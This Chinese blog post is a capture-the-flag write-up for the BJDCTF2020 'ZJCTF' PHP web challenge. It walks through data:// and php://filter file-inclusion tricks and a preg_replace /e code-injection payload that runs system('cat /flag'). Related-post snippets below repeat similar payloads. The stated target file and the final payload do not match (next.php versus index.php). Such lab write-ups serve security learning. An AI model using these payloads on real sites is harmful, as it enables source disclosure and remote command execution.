[BJDCTF2020]ZJCTF,不过如此

最新推荐文章于 2023-05-21 17:10:46 发布
最新推荐文章于 2023-05-21 17:10:46 发布
阅读量219 收藏
点赞数
文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56059226/article/details/117450651
版权

[BJDCTF2020]ZJCTF,不过如此

打开题目 首先是一段源代码:

<?php
​
error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }
​
    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

直接进行代码审计,看到有读取文件,想到了伪协议,因为file_get_contents是读取文件的,直接读字符串不行。直接上代码。?text=data://text/plain,I have a dream。也可以用?text=php://input,然后再post传参I have a dream一样的。满足了第一个if接着看,传入的参数file不能有flag字符,才可以包含传入的file,然后看到提示有个next.php。看到这里如果令file=next.php。只能让他包含进去,其他什么用都没有,况且他本来就包含了。所以这里应该是想办法看到next.php的内容是什么。

试了一下直接输next.php

 

 

果然什么都没有,那就再用php伪协议读取next.php里面的内容:file=php://filter/convert.base64-encode/resource=index.php。传进去后includ包含这个内容,就会把index.php的内容以base64编码的方式展现出来。

最后payload:?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=index.php.

 

接着把它解码

得到第二段源代码:

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;
​
function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
​
​
foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}
​
function getFlag(){
    @eval($_GET['cmd']);
}

首先解释foreach

发现这个讲的挺清楚:

$row=array('one'=>1,'two'=>2);
​
foreach($row as $key=>$val){
echo $key.'--'.$val;
#one--1
#two--2

而题目是foreach($_GET as $re => $str),假设用GET方法传一个index.php?hello=world那么$re=hello,$str=world

正则里面/i 是忽略大小写.然后解释/e: 正则表达式中的/e模式的作用是将替换串中的内容当作代码来执行

strtolower()的作用是把大写字母转换为小写字母。

可替换参数里面是 \\1就是\1的意思,意思是表示取出正则匹配后的第一个子匹配中的第一项,再看后面有个执行代码的函数。那思路就来了,想办法执行第三个函数就可以了。既然替只取出子匹配的第一项去替换,就让他的第一项就为我们想要执行的函数就可以达到目的了。构造payload:next.php?(\S*)=${getFlag()}&cmd=system('cat /flag'); (\S*)匹配第一项getFlag(),然后把换上去的getFlag()当做代码执行(这里为什么用的是\S)而不是用的(.*),因为php里会把参数名里的特殊字符转为下划线“_”。\S代表非空白字符。传进去后即执行了 →echo preg_replace('/(\S*)/ei','strtolower("\\1")',getFlag('cmd'));echo @eval(system('cat /flag');)

至于为什么是${getFlag()}而不是getFlag(),先附上连接PHP: 可变变量 - Manual

在php中,双引号里面如果包含有变量,php解释器会进行解析;所以这里如果传getFlag()的话替换后变成了strtolower("getFlag()"),需要让getFlag变成变量让双引号解析才可以执行,所以传的值为${getFlag()}。

最后得到flag^^

c1oud..
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
[BJDCTF2020]ZJCTF不过如此 -wp
freerats的博客
08-02 476
打开容器,进行代码审计 传入text和file参数,第一个可以用data伪协议绕过,然后接下来是一个文件包含,可以用php协议读取数据。 无法直接打开提示的next.php,所以用php协议读一下。 ?text=data://text/plain,I%20have%20a%20dream&file=php://filter/read=convert.base64-encode/resource=next.php 读出的源码如下 <?php $id = $_GET['id']; $_SESS.
buuctf-[BJDCTF2020]ZJCTF不过如此
qq_42728977的博客
12-26 2271
[BJDCTF2020]ZJCTF不过如此考点复现参考 考点 preg_replace /e 参数执行漏洞、php伪协议、转义绕过 复现 点开链接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1&g
ctf中的一道反序列化题
weixin_40709439的博客
09-27 5255
早就想写了,今天刚好遇到一道反序列化的题就记录一下 自己在本地搭的,源码如下: index1.php &lt;?php error_reporting(E_ALL &amp; ~E_NOTICE); $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&amp;&amp;...
BUUCTF刷题记录 NiZhuanSiWei
m0_46576074的博客
05-18 411
[ZJCTF 2019]NiZhuanSiWei 进入网址 源码分析 if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")) 用data伪协议传参 ?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 源码分析 if(preg_match("/flag/",$file)){ echo "Not now!";
[ZJCTF 2019]NiZhuanSiWei
qq_40860153的博客
10-10 176
1.打开题目看得到 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1&
CTF中遇见的PHP伪协议运用
热门推荐
byxs007的博客
12-15 1万+
关于PHP伪协议中的总结网上已经有很多文章了 LoRexxar的PHP伪协议总结 PHP伪协议 官方文档 以下都是在做CTF题目的时候遇见的一些知识点,每遇到一点就会在这面做一些总结 php://input php://input 是个可以访问请求的原始数据的只读流。因为它不依赖于特定的 php.ini 指令。 注:enctype=”multipart/form-d
BWVS-PHP伪协议
baynk的博客
11-26 885
0x00 前言 这个也算文件包含漏洞的一部分吧,刚刚好整理了下,就当漏洞复现了。 //php支持的伪协议 file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — 压缩流 data:// — 数据(RFC 2397) glob:// — ...
亚信java笔试题-BJDCTF2020_March:本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、江苏大学、湖南
06-03
BJDCTF2020_March 本届BJDCTF由江苏科技大学、北京工业大学、西南民族大学、杭州师范大学、 江苏大学、湖南工业大学(排名不分先后)联合举办 Notes:web题目easyaspnet需要在windows server 2016 docker native ...
justCTF-2020:justCTF 2020
05-24
《justCTF 2020:HTML技术在网络安全竞赛中的应用探析》 ...同时,通过分析justCTF-2020-master这个压缩包文件,我们可以深入研究比赛的具体挑战,学习并复盘过去的案例,以期在未来类似的竞争中取得更好的成绩。
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin – 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
BJDCTF-writeup
01-20
本篇文章为个人做题时的部分wp,如有错误,请联系我更正。 目录杂项最简单的misc-y1ngA_Beautiful_Picture小姐姐-y1ngEasyBaBa圣火昭昭-y1ngTARGZ-y1ngReal_EasyBaBa总结 杂项 最简单的misc-y1ng ...
bugku-welcome to bugkuctf(PHP伪协议&PHP反序列化综合运用)
烟敛寒林的博客
04-26 1256
1.通过php://input对变量输入内容,让file_get_contents能够读取变量的内容 2.通过php://filter/read=convert.base64-encode/resource=xxx.php得到其他PHP文件的源代码 3.通过反序列化,对echo的魔术方法__tostring()里面的参数进行赋值 题目地址:http://123.206.87.240...
ctf php正则截断,记[BJDCTF2020]ZJCTF不过如此 关于php的正则匹配问题
weixin_42099942的博客
03-17 531
题目一上来就直接放出一段代码,那么话不多说,直接进行代码设计。error_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){echo "".file_get_contents($tex...
文件包含函数
最新发布
qq_70851535的博客
05-21 1228
将代码传入文件,从而直接执行文件中的代码通常文件包含漏洞产生于文件包含函数LFI:Local File Inclusion,本地文件包含漏洞,大部分情况下遇到的文件包含漏洞都是LFIRFI:Remote File Inclusion,远程文件包含漏洞(默认为On) ,规定是否允许从远程服务器或者网站检索数据(php5.2之后默认为Off) ,规定是否允许远程文件。
php file get contents 空,file_get_contents()函数为空
weixin_39747296的博客
04-15 679
if(isset($_REQUEST['act'])){$act=$_REQUEST['act'];}if(isset($_REQUEST['filename'])){$filename=$_REQUEST['filename'];}$redirect="index.php?path={$path}";if(isset($act)){if($act=="createFile"){/...
ctf题php反序列化,[世安杯]一道关于php反序列化漏洞的题目
weixin_36440198的博客
04-01 983
Paste_Image.png没什么信息,因此ctrl+u查看源码:Paste_Image.png看到提示,file_get_contents()函数,联想到文件包含漏洞,因此google一波,查到Paste_Image.png查看原文因此试一试:Paste_Image.png补充一种饶过方法:由于本题:allow_url_include=On因此可以包含一个远程文件,假设你的云服务IP地址为:x...
web--php
lulu001128的博客
03-30 102
解题过程
ctf题php反序列化,从一道CTF题中学习php反序列化与伪协议
weixin_39927214的博客
04-01 1783
之前一直有想写关于反序列化的东西,可是一直拖拖拖,拖到了现在。本文尝试从ZJCTF2019中的例题来了解何为php反序列,以及php伪协议。原题:逆转思维1234567891011121314151617181920$text = $_GET["text"];$file = $_GET["file"];$password = $_GET["password"];if(isset($text)&am...
CTFshow——文件包含
D.MIND 的博客
02-07 2150
web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 这里有个include文件包含。利用Filter机制,构造php://filter/convert.base64-encode/resource=×××的攻击数据读取文件,拿到各种文件的源码 payload: ?file=php://filter/conv
[bjdctf2020]zjctf不过如此
03-16
[bjdctf202]zjctf不过如此,是一道比赛题目的名称。具体的题目内容和解法我不清楚,因为我只是一个人工智能语言模型,没有参加过这个比赛。不过,如果您有相关的问题或者需要帮助,我会尽力回答和帮助您。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值